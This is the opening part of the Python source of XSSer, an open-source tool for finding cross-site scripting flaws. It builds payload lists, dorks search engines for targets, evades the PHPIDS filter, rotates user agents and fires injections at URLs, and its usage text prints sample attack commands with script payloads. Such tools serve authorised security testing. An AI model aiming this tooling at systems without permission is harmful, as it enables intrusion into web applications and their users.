main.py 185 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631641651661671681691701711721731741751761771781791801811821831841851861871881891901911921931941951961971981992002012022032042052062072082092102112122132142152162172182192202212222232242252262272282292302312322332342352362372382392402412422432442452462472482492502512522532542552562572582592602612622632642652662672682692702712722732742752762772782792802812822832842852862872882892902912922932942952962972982993003013023033043053063073083093103113123133143153163173183193203213223233243253263273283293303313323333343353363373383393403413423433443453463473483493503513523533543553563573583593603613623633643653663673683693703713723733743753763773783793803813823833843853863873883893903913923933943953963973983994004014024034044054064074084094104114124134144154164174184194204214224234244254264274284294304314324334344354364374384394404414424434444454464474484494504514524534544554564574584594604614624634644654664674684694704714724734744754764774784794804814824834844854864874884894904914924934944954964974984995005015025035045055065075085095105115125135145155165175185195205215225235245255265275285295305315325335345355365375385395405415425435445455465475485495505515525535545555565575585595605615625635645655665675685695705715725735745755765775785795805815825835845855865875885895905915925935945955965975985996006016026036046056066076086096106116126136146156166176186196206216226236246256266276286296306316326336346356366376386396406416426436446456466476486496506516526536546556566576586596606616626636646656666676686696706716726736746756766776786796806816826836846856866876886896906916926936946956966976986997007017027037047057067077087097107117127137147157167177187197207217227237247257267277287297307317327337347357367377387397407417427437447457467477487497507517527537547557567577587597607617627637647657667677687697707717727737747757767777787797807817827837847857867877887897907917927937947957967977987998008018028038048058068078088098108118128138148158168178188198208218228238248258268278288298308318328338348358368378388398408418428438448458468478488498508518528538548558568578588598608618628638648658668678688698708718728738748758768778788798808818828838848858868878888898908918928938948958968978988999009019029039049059069079089099109119129139149159169179189199209219229239249259269279289299309319329339349359369379389399409419429439449459469479489499509519529539549559569579589599609619629639649659669679689699709719729739749759769779789799809819829839849859869879889899909919929939949959969979989991000100110021003100410051006100710081009101010111012101310141015101610171018101910201021102210231024102510261027102810291030103110321033103410351036103710381039104010411042104310441045104610471048104910501051105210531054105510561057105810591060106110621063106410651066106710681069107010711072107310741075107610771078107910801081108210831084108510861087108810891090109110921093109410951096109710981099110011011102110311041105110611071108110911101111111211131114111511161117111811191120112111221123112411251126112711281129113011311132113311341135113611371138113911401141114211431144114511461147114811491150115111521153115411551156115711581159116011611162116311641165116611671168116911701171117211731174117511761177117811791180118111821183118411851186118711881189119011911192119311941195119611971198119912001201120212031204120512061207120812091210121112121213121412151216121712181219122012211222122312241225122612271228122912301231123212331234123512361237123812391240124112421243124412451246124712481249125012511252125312541255125612571258125912601261126212631264126512661267126812691270127112721273127412751276127712781279128012811282128312841285128612871288128912901291129212931294129512961297129812991300130113021303130413051306130713081309131013111312131313141315131613171318131913201321132213231324132513261327132813291330133113321333133413351336133713381339134013411342134313441345134613471348134913501351135213531354135513561357135813591360136113621363136413651366136713681369137013711372137313741375137613771378137913801381138213831384138513861387138813891390139113921393139413951396139713981399140014011402140314041405140614071408140914101411141214131414141514161417141814191420142114221423142414251426142714281429143014311432143314341435143614371438143914401441144214431444144514461447144814491450145114521453145414551456145714581459146014611462146314641465146614671468146914701471147214731474147514761477147814791480148114821483148414851486148714881489149014911492149314941495149614971498149915001501150215031504150515061507150815091510151115121513151415151516151715181519152015211522152315241525152615271528152915301531153215331534153515361537153815391540154115421543154415451546154715481549155015511552155315541555155615571558155915601561156215631564156515661567156815691570157115721573157415751576157715781579158015811582158315841585158615871588158915901591159215931594159515961597159815991600160116021603160416051606160716081609161016111612161316141615161616171618161916201621162216231624162516261627162816291630163116321633163416351636163716381639164016411642164316441645164616471648164916501651165216531654165516561657165816591660166116621663166416651666166716681669167016711672167316741675167616771678167916801681168216831684168516861687168816891690169116921693169416951696169716981699170017011702170317041705170617071708170917101711171217131714171517161717171817191720172117221723172417251726172717281729173017311732173317341735173617371738173917401741174217431744174517461747174817491750175117521753175417551756175717581759176017611762176317641765176617671768176917701771177217731774177517761777177817791780178117821783178417851786178717881789179017911792179317941795179617971798179918001801180218031804180518061807180818091810181118121813181418151816181718181819182018211822182318241825182618271828182918301831183218331834183518361837183818391840184118421843184418451846184718481849185018511852185318541855185618571858185918601861186218631864186518661867186818691870187118721873187418751876187718781879188018811882188318841885188618871888188918901891189218931894189518961897189818991900190119021903190419051906190719081909191019111912191319141915191619171918191919201921192219231924192519261927192819291930193119321933193419351936193719381939194019411942194319441945194619471948194919501951195219531954195519561957195819591960196119621963196419651966196719681969197019711972197319741975197619771978197919801981198219831984198519861987198819891990199119921993199419951996199719981999200020012002200320042005200620072008200920102011201220132014201520162017201820192020202120222023202420252026202720282029203020312032203320342035203620372038203920402041204220432044204520462047204820492050205120522053205420552056205720582059206020612062206320642065206620672068206920702071207220732074207520762077207820792080208120822083208420852086208720882089209020912092209320942095209620972098209921002101210221032104210521062107210821092110211121122113211421152116211721182119212021212122212321242125212621272128212921302131213221332134213521362137213821392140214121422143214421452146214721482149215021512152215321542155215621572158215921602161216221632164216521662167216821692170217121722173217421752176217721782179218021812182218321842185218621872188218921902191219221932194219521962197219821992200220122022203220422052206220722082209221022112212221322142215221622172218221922202221222222232224222522262227222822292230223122322233223422352236223722382239224022412242224322442245224622472248224922502251225222532254225522562257225822592260226122622263226422652266226722682269227022712272227322742275227622772278227922802281228222832284228522862287228822892290229122922293229422952296229722982299230023012302230323042305230623072308230923102311231223132314231523162317231823192320232123222323232423252326232723282329233023312332233323342335233623372338233923402341234223432344234523462347234823492350235123522353235423552356235723582359236023612362236323642365236623672368236923702371237223732374237523762377237823792380238123822383238423852386238723882389239023912392239323942395239623972398239924002401240224032404240524062407240824092410241124122413241424152416241724182419242024212422242324242425242624272428242924302431243224332434243524362437243824392440244124422443244424452446244724482449245024512452245324542455245624572458245924602461246224632464246524662467246824692470247124722473247424752476247724782479248024812482248324842485248624872488248924902491249224932494249524962497249824992500250125022503250425052506250725082509251025112512251325142515251625172518251925202521252225232524252525262527252825292530253125322533253425352536253725382539254025412542254325442545254625472548254925502551255225532554255525562557255825592560256125622563256425652566256725682569257025712572257325742575257625772578257925802581258225832584258525862587258825892590259125922593259425952596259725982599260026012602260326042605260626072608260926102611261226132614261526162617261826192620262126222623262426252626262726282629263026312632263326342635263626372638263926402641264226432644264526462647264826492650265126522653265426552656265726582659266026612662266326642665266626672668266926702671267226732674267526762677267826792680268126822683268426852686268726882689269026912692269326942695269626972698269927002701270227032704270527062707270827092710271127122713271427152716271727182719272027212722272327242725272627272728272927302731273227332734273527362737273827392740274127422743274427452746274727482749275027512752275327542755275627572758275927602761276227632764276527662767276827692770277127722773277427752776277727782779278027812782278327842785278627872788278927902791279227932794279527962797279827992800280128022803280428052806280728082809281028112812281328142815281628172818281928202821282228232824282528262827282828292830283128322833283428352836283728382839284028412842284328442845284628472848284928502851285228532854285528562857285828592860286128622863286428652866286728682869287028712872287328742875287628772878287928802881288228832884288528862887288828892890289128922893289428952896289728982899290029012902290329042905290629072908290929102911291229132914291529162917291829192920292129222923292429252926292729282929293029312932293329342935293629372938293929402941294229432944294529462947294829492950295129522953295429552956295729582959296029612962296329642965296629672968296929702971297229732974297529762977297829792980298129822983298429852986298729882989299029912992299329942995299629972998299930003001300230033004300530063007300830093010301130123013301430153016301730183019302030213022302330243025302630273028302930303031303230333034303530363037303830393040304130423043304430453046304730483049305030513052305330543055305630573058305930603061306230633064306530663067306830693070307130723073307430753076307730783079308030813082308330843085308630873088308930903091309230933094309530963097309830993100310131023103310431053106310731083109311031113112311331143115311631173118311931203121312231233124312531263127312831293130313131323133313431353136313731383139314031413142314331443145314631473148314931503151315231533154315531563157315831593160316131623163316431653166316731683169317031713172317331743175317631773178317931803181318231833184318531863187318831893190319131923193319431953196319731983199320032013202320332043205320632073208320932103211321232133214321532163217321832193220322132223223322432253226322732283229323032313232323332343235323632373238323932403241324232433244324532463247324832493250325132523253325432553256325732583259326032613262326332643265326632673268326932703271327232733274327532763277327832793280328132823283328432853286328732883289329032913292329332943295329632973298329933003301330233033304330533063307330833093310331133123313331433153316331733183319332033213322332333243325332633273328332933303331333233333334333533363337333833393340334133423343334433453346334733483349335033513352335333543355335633573358335933603361336233633364336533663367336833693370337133723373337433753376337733783379338033813382338333843385338633873388338933903391339233933394339533963397339833993400340134023403340434053406340734083409341034113412341334143415341634173418341934203421342234233424342534263427342834293430343134323433343434353436343734383439344034413442344334443445344634473448344934503451345234533454345534563457345834593460346134623463346434653466346734683469347034713472347334743475347634773478347934803481348234833484348534863487348834893490349134923493349434953496349734983499350035013502350335043505350635073508350935103511351235133514351535163517351835193520352135223523
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. # vim: set expandtab tabstop=4 shiftwidth=4:
  4. """
  5. This file is part of the XSSer project, https://xsser.03c8.net
  6. Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
  7. xsser is free software; you can redistribute it and/or modify it under
  8. the terms of the GNU General Public License as published by the Free
  9. Software Foundation version 3 of the License.
  10. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
  11. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  12. FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
  13. details.
  14. You should have received a copy of the GNU General Public License along
  15. with xsser; if not, write to the Free Software Foundation, Inc., 51
  16. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  17. """
  18. import os, re, sys, datetime, hashlib, time, urllib, cgi, traceback, webbrowser, random
  19. from random import randint
  20. from base64 import b64encode, b64decode
  21. import core.fuzzing
  22. import core.fuzzing.vectors
  23. import core.fuzzing.DCP
  24. import core.fuzzing.DOM
  25. import core.fuzzing.HTTPsr
  26. import core.fuzzing.heuristic
  27. from collections import defaultdict
  28. from itertools import islice, chain
  29. from urlparse import parse_qs, urlparse
  30. from core.curlcontrol import Curl
  31. from core.encdec import EncoderDecoder
  32. from core.options import XSSerOptions
  33. from core.dork import Dorker
  34. from core.crawler import Crawler
  35. from core.imagexss import ImageInjections
  36. from core.flashxss import FlashInjections
  37. from core.post.xml_exporter import xml_reporting
  38. from core.tokenhub import HubThread
  39. from core.reporter import XSSerReporter
  40. from core.threadpool import ThreadPool, NoResultsPending
  41. from core.update import Updater
  42. # set to emit debug messages about errors (0 = off).
  43. DEBUG = 0
  44. class xsser(EncoderDecoder, XSSerReporter):
  45. """
  46. XSSer application class
  47. """
  48. def __init__(self, mothership=None):
  49. self._reporter = None
  50. self._reporters = []
  51. self._landing = False
  52. self._ongoing_requests = 0
  53. self._oldcurl = []
  54. self._gtkdir = None
  55. self._webbrowser = webbrowser
  56. self.crawled_urls = []
  57. self.checked_urls = []
  58. self.successful_urls = []
  59. self.urlmalformed = False
  60. self.search_engines = [] # available dorking search engines
  61. self.search_engines.append('bing') # [26/08/2019: OK!]
  62. self.search_engines.append('yahoo') # [26/08/2019: OK!]
  63. self.search_engines.append('startpage') # [26/08/2019: OK!]
  64. self.search_engines.append('duck') # [26/08/2019: OK!]
  65. #self.search_engines.append('google')
  66. #self.search_engines.append('yandex')
  67. self.user_template = None # wizard user template
  68. self.user_template_conntype = "GET" # GET by default
  69. self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
  70. if not mothership:
  71. # no mothership so *this* is the mothership
  72. # start the communications hub and rock on!
  73. self.hub = None
  74. self.pool = ThreadPool(0)
  75. self.mothership = None
  76. self.final_attacks = {}
  77. else:
  78. self.hub = None
  79. self.mothership = mothership
  80. self.mothership.add_reporter(self)
  81. self.pool = ThreadPool(0)
  82. self.final_attacks = self.mothership.final_attacks
  83. # initialize the url encoder/decoder
  84. EncoderDecoder.__init__(self)
  85. # your unique real opponent
  86. self.time = datetime.datetime.now()
  87. # this payload comes with vector already..
  88. self.DEFAULT_XSS_PAYLOAD = 'XSS'
  89. # to be or not to be...
  90. self.hash_found = []
  91. self.hash_notfound = []
  92. # other hashes
  93. self.hashed_injections={}
  94. self.extra_hashed_injections={}
  95. self.extra_hashed_vector_url = {}
  96. self.final_hashes = {} # final hashes used by each method
  97. # some counters for checker systems
  98. self.errors_isalive = 0
  99. self.next_isalive = False
  100. self.flag_isalive_num = 0
  101. self.rounds = 0
  102. self.round_complete = 0
  103. # some controls about targets
  104. self.urlspoll = []
  105. # some statistics counters for connections
  106. self.success_connection = 0
  107. self.not_connection = 0
  108. self.forwarded_connection = 0
  109. self.other_connection = 0
  110. # some statistics counters for payloads
  111. self.xsr_injection = 0
  112. self.xsa_injection = 0
  113. self.coo_injection = 0
  114. self.manual_injection = 0
  115. self.auto_injection = 0
  116. self.dcp_injection = 0
  117. self.dom_injection = 0
  118. self.httpsr_injection = 0
  119. self.check_positives = 0
  120. # some statistics counters for injections found
  121. self.xsr_found = 0
  122. self.xsa_found = 0
  123. self.coo_found = 0
  124. self.manual_found = 0
  125. self.auto_found = 0
  126. self.dcp_found = 0
  127. self.dom_found = 0
  128. self.httpsr_found = 0
  129. self.false_positives = 0
  130. # some statistics counters for heuristic parameters
  131. self.heuris_hashes = []
  132. self.heuris_backslash_found = 0
  133. self.heuris_une_backslash_found = 0
  134. self.heuris_dec_backslash_found = 0
  135. self.heuris_backslash_notfound = 0
  136. self.heuris_slash_found = 0
  137. self.heuris_une_slash_found = 0
  138. self.heuris_dec_slash_found = 0
  139. self.heuris_slash_notfound = 0
  140. self.heuris_mayor_found = 0
  141. self.heuris_une_mayor_found = 0
  142. self.heuris_dec_mayor_found = 0
  143. self.heuris_mayor_notfound = 0
  144. self.heuris_minor_found = 0
  145. self.heuris_une_minor_found = 0
  146. self.heuris_dec_minor_found = 0
  147. self.heuris_minor_notfound = 0
  148. self.heuris_semicolon_found = 0
  149. self.heuris_une_semicolon_found = 0
  150. self.heuris_dec_semicolon_found = 0
  151. self.heuris_semicolon_notfound = 0
  152. self.heuris_colon_found = 0
  153. self.heuris_une_colon_found = 0
  154. self.heuris_dec_colon_found = 0
  155. self.heuris_colon_notfound = 0
  156. self.heuris_doublecolon_found = 0
  157. self.heuris_une_doublecolon_found = 0
  158. self.heuris_dec_doublecolon_found = 0
  159. self.heuris_doublecolon_notfound = 0
  160. self.heuris_equal_found = 0
  161. self.heuris_une_equal_found = 0
  162. self.heuris_dec_equal_found = 0
  163. self.heuris_equal_notfound = 0
  164. # xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
  165. self.verbose = 2
  166. self.options = None
  167. def __del__(self):
  168. if not self._landing:
  169. self.land()
  170. def get_gtk_directory(self):
  171. if self._gtkdir:
  172. return self._gtkdir
  173. local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
  174. 'gtk')
  175. if os.path.exists(local_path):
  176. self._gtkdir = local_path
  177. return self._gtkdir
  178. elif os.path.exists('/usr/share/xsser/gtk'):
  179. self._gtkdir = '/usr/share/xsser/gtk'
  180. return self._gtkdir
  181. def set_webbrowser(self, browser):
  182. self._webbrowser = browser
  183. def set_reporter(self, reporter):
  184. self._reporter = reporter
  185. def add_reporter(self, reporter):
  186. self._reporters.append(reporter)
  187. def remove_reporter(self, reporter):
  188. if reporter in self._reporters:
  189. self._reporters.remove(reporter)
  190. def generate_hash(self, attack_type='default'):
  191. """
  192. Generate a new hash for a type of attack.
  193. """
  194. return hashlib.md5(str(datetime.datetime.now()) + attack_type).hexdigest()
  195. def generate_numeric_hash(self): # 32 length as md5
  196. """
  197. Generate a new hash for numeric only XSS
  198. """
  199. newhash = ''.join(random.choice('0123456789') for i in range(32))
  200. return newhash
  201. def report(self, msg, level='info'):
  202. """
  203. Report some error from the application.
  204. levels: debug, info, warning, error
  205. """
  206. if self.verbose == 2:
  207. prefix = ""
  208. if level != 'info':
  209. prefix = "["+level+"] "
  210. print msg
  211. elif self.verbose:
  212. if level == 'error':
  213. sys.stdout.write("*")
  214. else:
  215. sys.stdout.write(".")
  216. for reporter in self._reporters:
  217. reporter.post(msg)
  218. if self._reporter:
  219. from twisted.internet import reactor
  220. reactor.callFromThread(self._reporter.post, msg)
  221. def set_options(self, options):
  222. """
  223. Set xsser options
  224. """
  225. self.options = options
  226. self._opt_request()
  227. def _opt_request(self):
  228. """
  229. Pass on some properties to Curl
  230. """
  231. options = self.options
  232. for opt in ['cookie', 'agent', 'referer',\
  233. 'headers', 'atype', 'acred', 'acert',
  234. 'proxy', 'ignoreproxy', 'timeout',
  235. 'delay', 'tcp_nodelay', 'retries',
  236. 'xforw', 'xclient', 'threads',
  237. 'dropcookie', 'followred', 'fli',
  238. 'nohead', 'isalive', 'alt', 'altm',
  239. 'ald'
  240. ]:
  241. if hasattr(options, opt) and getattr(options, opt):
  242. setattr(Curl, opt, getattr(options, opt))
  243. def get_payloads(self):
  244. """
  245. Process payload options and make up the payload list for the attack.
  246. """
  247. options = self.options
  248. # payloading sources for --auto
  249. payloads_fuzz = core.fuzzing.vectors.vectors
  250. if options.fzz_info or options.fzz_num or options.fzz_rand and not options.fuzz:
  251. self.options.fuzz = True
  252. # set a type for XSS auto-fuzzing vectors
  253. if options.fzz_info:
  254. fzz_payloads = []
  255. for fuzz in payloads_fuzz:
  256. if not fuzz["browser"] == "[Not Info]":
  257. fzz_payloads.append(fuzz)
  258. payloads_fuzz = fzz_payloads
  259. # set a limit for XSS auto-fuzzing vectors
  260. if options.fzz_num:
  261. try:
  262. options.fzz_num = int(options.fzz_num)
  263. except:
  264. options.fzz_num = len(payloads_fuzz)
  265. fzz_num_payloads = []
  266. fzz_vector = 0
  267. for fuzz in payloads_fuzz:
  268. fzz_vector = fzz_vector + 1
  269. if int(fzz_vector) < int(options.fzz_num)+1:
  270. fzz_num_payloads.append(fuzz)
  271. payloads_fuzz = fzz_num_payloads
  272. # set random order for XSS auto-fuzzing vectors
  273. if options.fzz_rand:
  274. try:
  275. from random import shuffle
  276. shuffle(payloads_fuzz) # shuffle paylods
  277. except:
  278. pass
  279. payloads_dcp = core.fuzzing.DCP.DCPvectors
  280. payloads_dom = core.fuzzing.DOM.DOMvectors
  281. payloads_httpsr = core.fuzzing.HTTPsr.HTTPrs_vectors
  282. manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
  283. # sustitute payload for hash to check for false positives
  284. self.hashed_payload = "XSS"
  285. checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
  286. # heuristic parameters
  287. heuristic_params = core.fuzzing.heuristic.heuristic_test
  288. def enable_options_heuristic(payloads):
  289. if options.heuristic:
  290. payloads = heuristic_params + payloads
  291. if options.dom:
  292. payloads = payloads + payloads_dom
  293. return payloads
  294. if options.fuzz:
  295. payloads = payloads_fuzz
  296. if options.dcp:
  297. payloads = payloads + payloads_dcp
  298. if options.script:
  299. payloads = payloads + manual_payload
  300. if options.hash:
  301. payloads = checker_payload + payloads
  302. if options.inducedcode:
  303. payloads = payloads + payloads_httpsr
  304. if options.heuristic:
  305. payloads = heuristic_params + payloads
  306. if options.dom:
  307. payloads = payloads + payloads_dom
  308. elif options.inducedcode:
  309. payloads = payloads + payloads_httpsr
  310. if options.heuristic:
  311. payloads = heuristic_params + payloads
  312. if options.dom:
  313. payloads = payloads + payloads_dom
  314. elif options.dom:
  315. payloads = payloads + payloads_dom
  316. elif options.heuristic:
  317. payloads = heuristic_params + payloads
  318. if options.dom:
  319. payloads = payloads + payloads_dom
  320. elif options.dom:
  321. payloads = payloads + payloads_dom
  322. elif options.hash:
  323. payloads = checker_payload + payloads
  324. if options.inducedcode:
  325. payloads = payloads + payloads_httpsr
  326. if options.heuristic:
  327. payloads = heuristic_params + payloads
  328. if options.dom:
  329. payloads = payloads + payloads_dom
  330. elif options.dom:
  331. payloads = payloads + payloads_dom
  332. elif options.inducedcode:
  333. payloads = payloads + payloads_httpsr
  334. if options.heuristic:
  335. payloads = heuristic_params + payloads
  336. if options.dom:
  337. payloads = payloads + payloads_dom
  338. elif options.dom:
  339. payloads = payloads + payloads_dom
  340. elif options.script:
  341. payloads = payloads + manual_payload
  342. if options.hash:
  343. payloads = checker_payload + payloads
  344. if options.inducedcode:
  345. payloads = payaloads + payloads_httpsr
  346. if options.heuristic:
  347. payloads = heuristic_params + payloads
  348. if options.dom:
  349. payloads = payloads + payloads_dom
  350. elif options.hash:
  351. payloads = checker_payload + payloads
  352. if options.inducedcode:
  353. payloads = payloads + payloads_httpsr
  354. if options.heuristic:
  355. payloads = heuristic_params + payloads
  356. if options.dom:
  357. payloads = payloads + payloads_dom
  358. elif options.dom:
  359. payloads = payloads + payloads_dom
  360. elif options.heuristic:
  361. payloads = heuristic_params + payloads
  362. if options.dom:
  363. payloads = payloads + payloads_dom
  364. elif options.dom:
  365. payloads = payloads + payloads_dom
  366. elif options.inducedcode:
  367. payloads = payloads + payloads_httpsr
  368. if options.hash:
  369. payloads = checker_payload + payloads
  370. if options.heuristic:
  371. payloads = heuristic_params + payloads
  372. if options.dom:
  373. payloads = payloads + payloads_dom
  374. elif options.dom:
  375. payloads = payloads + payloads_dom
  376. elif options.heuristic:
  377. payloads = heuristic_params + payloads
  378. if options.dom:
  379. payloads = payloads + payloads_dom
  380. elif options.dom:
  381. payloads = payloads + payloads_dom
  382. elif options.dcp:
  383. payloads = payloads_dcp
  384. if options.script:
  385. payloads = payloads + manual_payload
  386. if options.hash:
  387. payloads = checker_payload + payloads
  388. if options.inducedcode:
  389. payloads = payloads + payloads_httpsr
  390. if options.heuristic:
  391. payloads = heuristic_params + payloads
  392. if options.dom:
  393. payloads = payloads + payloads_dom
  394. elif options.hash:
  395. payloads = checker_payload + payloads
  396. if options.inducedcode:
  397. payloads = payloads + inducedcode
  398. if options.heuristic:
  399. payloads = heuristic_params + payloads
  400. if options.dom:
  401. payloads = payloads + payloads_dom
  402. elif options.dom:
  403. payloads = payloads + payloads_dom
  404. elif options.inducedcode:
  405. payloads = payloads + payloads_httpsr
  406. if options.heuristic:
  407. payloads = heuristic_params + payloads
  408. if options.dom:
  409. payloads = payloads + payloads_dom
  410. elif options.dom:
  411. payloads = payloads + payloads_dom
  412. elif options.heuristic:
  413. payloads = heuristic_params + payloads
  414. if options.dom:
  415. payloads = payloads + payloads_dom
  416. elif options.dom:
  417. payloads = payloads + payloads_dom
  418. elif options.script:
  419. payloads = manual_payload
  420. if options.hash:
  421. payloads = checker_payload + payloads
  422. if options.inducedcode:
  423. payloads = payloads + payloads_httpsr
  424. if options.heuristic:
  425. payloads = heuristic_params + payloads
  426. if options.dom:
  427. payloads = payloads + payloads_dom
  428. elif options.inducedcode:
  429. payloads = payloads + payloads_httpsr
  430. if options.heuristic:
  431. payloads = heuristic_params + payloads
  432. if options.dom:
  433. payloads = payloads + payloads_dom
  434. elif options.dom:
  435. payloads = payloads + payloads_dom
  436. elif options.heuristic:
  437. payloads = heuristic_params + payloads
  438. if options.dom:
  439. paylaods = payloads + payloads_dom
  440. elif options.dom:
  441. payloads = payloads + payloads_dom
  442. elif options.inducedcode:
  443. payloads = payloads_httpsr
  444. if options.hash:
  445. payloads = checker_payload + payloads
  446. if options.heuristic:
  447. payloads = heuristic_params + payloads
  448. if options.dom:
  449. payloads = payloads + payloads_dom
  450. elif options.heuristic:
  451. payloads = heuristic_params + payloads
  452. if options.dom:
  453. payloads = payloads + payloads_dom
  454. elif options.dom:
  455. payloads = payloads + payloads_dom
  456. elif options.heuristic:
  457. payloads = heuristic_params
  458. if options.hash:
  459. payloads = checker_payload + payloads
  460. if options.dom:
  461. payloads = payloads + payloads_dom
  462. elif options.dom:
  463. payloads = payloads + payloads_dom
  464. elif options.dom:
  465. payloads = payloads_dom
  466. elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
  467. payloads = [{"payload":'">PAYLOAD',
  468. "browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
  469. }]
  470. else:
  471. payloads = checker_payload
  472. return payloads
  473. def process_ipfuzzing(self, text):
  474. """
  475. Mask ips in given text to DWORD
  476. """
  477. ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
  478. for ip in ips:
  479. text = text.replace(ip, str(self._ipDwordEncode(ip)))
  480. return text
  481. def process_ipfuzzing_octal(self, text):
  482. """
  483. Mask ips in given text to Octal
  484. """
  485. ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
  486. for ip in ips:
  487. text = text.replace(ip, str(self._ipOctalEncode(ip)))
  488. return text
  489. def process_payloads_ipfuzzing(self, payloads):
  490. """
  491. Mask ips for all given payloads using DWORD
  492. """
  493. # ip fuzzing (DWORD)
  494. if self.options.Dwo:
  495. resulting_payloads = []
  496. for payload in payloads:
  497. payload["payload"] = self.process_ipfuzzing(payload["payload"])
  498. resulting_payloads.append(payload)
  499. return resulting_payloads
  500. return payloads
  501. def process_payloads_ipfuzzing_octal(self, payloads):
  502. """
  503. Mask ips for all given payloads using OCTAL
  504. """
  505. # ip fuzzing (OCTAL)
  506. if self.options.Doo:
  507. resulting_payloads = []
  508. for payload in payloads:
  509. payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
  510. resulting_payloads.append(payload)
  511. return resulting_payloads
  512. return payloads
  513. def get_query_string(self):
  514. """
  515. Get the supplied query string.
  516. """
  517. if self.options.postdata:
  518. return self.options.postdata
  519. elif self.options.getdata:
  520. return self.options.getdata
  521. return ""
  522. def attack_url(self, url, payloads, query_string):
  523. """
  524. Attack the given url checking or not if is correct.
  525. """
  526. if not self.options.nohead:
  527. for payload in payloads:
  528. self.rounds = self.rounds + 1
  529. self.attack_url_payload(url, payload, query_string)
  530. else:
  531. hc = Curl()
  532. try:
  533. urls = hc.do_head_check([url])
  534. except:
  535. self.report("[Error] Target URL: (" + url + ") is malformed!" + " [DISCARDED]" + "\n")
  536. return
  537. self.report("-"*50 + "\n")
  538. if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
  539. if str(hc.info()["http-code"]) in ["301"]:
  540. url = str(hc.info()["Location"])
  541. payload = ""
  542. query_string = ""
  543. elif str(hc.info()["http-code"]) in ["302"]:
  544. url = url + "/"
  545. payload = ""
  546. query_string = ""
  547. self.success_connection = self.success_connection + 1
  548. self.report("[Info] HEAD-CHECK: OK! [HTTP-" + hc.info()["http-code"] + "] -> [AIMED]\n")
  549. for payload in payloads:
  550. self.attack_url_payload(url, payload, query_string)
  551. else:
  552. if str(hc.info()["http-code"]) in ["405"]:
  553. self.report("[Info] HEAD-CHECK: NOT ALLOWED! [HTTP-" + hc.info()["http-code"] + "] -> [PASSING]\n")
  554. self.success_connection = self.success_connection + 1
  555. for payload in payloads:
  556. self.attack_url_payload(url, payload, query_string)
  557. else:
  558. self.not_connection = self.not_connection + 1
  559. self.report("[Error] HEAD-CHECK: FAILED! [HTTP-" + hc.info()["http-code"] + "] -> [DISCARDED]\n")
  560. self.report("-"*50 + "\n")
  561. def not_keyword_exit(self):
  562. self.report("="*30)
  563. self.report("\n[Error] XSSer cannot find a correct place to start an attack. Aborting!...\n")
  564. self.report("-"*25)
  565. self.report("\n[Info] This is because you aren't providing:\n\n At least one -payloader- using a keyword: 'XSS' (for hex.hash) or 'X1S' (for int.hash):\n")
  566. self.report(" - ex (GET): xsser -u 'https://target.com' -g '/path/profile.php?username=bob&surname=XSS&age=X1S&job=XSS'")
  567. self.report(" - ex (POST): xsser -u 'https://target.com/login.php' -p 'username=bob&password=XSS&captcha=X1S'\n")
  568. self.report(" Any extra attack(s) (Xsa, Xsr, Coo, Dorker, Crawler...):\n")
  569. self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/path/id.php?=2' --Coo")
  570. self.report(" - ex (POST+XSA+XSR+Cookie): xsser -u 'https://target.com/login.php' -p 'username=admin&password=admin' --Xsa --Xsr --Coo")
  571. self.report(" - ex (Dorker): xsser -d 'news.php?id=' --Da")
  572. self.report(" - ex (Crawler): xsser -u 'https://target.com' -c 100 --Cl\n")
  573. self.report(" Or a mixture:\n")
  574. self.report(" - ex (GET+Manual): xsser -u 'https://target.com' -g '/users/profile.php?user=XSS&salary=X1S' --payload='<script>alert(XSS);</script>'")
  575. self.report(" - ex (POST+Manual): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --payload='}}%%&//<sc&ri/pt>(XSS)--;>'\n")
  576. self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/login.asp?user=bob&password=XSS' --Coo")
  577. self.report(" - ex (POST+XSR+XSA): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --Xsr --Xsa\n")
  578. self.report("="*75 + "\n")
  579. if not self.options.xsser_gtk:
  580. sys.exit(2)
  581. else:
  582. pass
  583. def get_url_payload(self, url, payload, query_string, user_attack_payload):
  584. """
  585. Attack the given url with the given payload
  586. """
  587. options = self.options
  588. self._ongoing_attacks = {}
  589. if (self.options.xsa or self.options.xsr or self.options.coo):
  590. agent, referer, cookie = self._prepare_extra_attacks(payload)
  591. else:
  592. agents = [] # user-agents
  593. try:
  594. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  595. except:
  596. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  597. for line in f:
  598. agents.append(line)
  599. agent = random.choice(agents).strip() # set random user-agent
  600. referer = "127.0.0.1"
  601. cookie = None
  602. if options.agent:
  603. agent = options.agent
  604. else:
  605. self.options.agent = agent
  606. if options.referer:
  607. referer = options.referer
  608. else:
  609. self.options.referer = referer
  610. if options.cookie:
  611. cookie = options.cookie
  612. else:
  613. self.options.cookie = cookie
  614. # get payload/vector
  615. payload_string = payload['payload'].strip()
  616. ### Anti-antiXSS exploits
  617. # PHPIDS (>0.6.5) [ALL] -> 32*payload + payload
  618. if options.phpids065:
  619. payload_string = 32*payload_string + payload_string
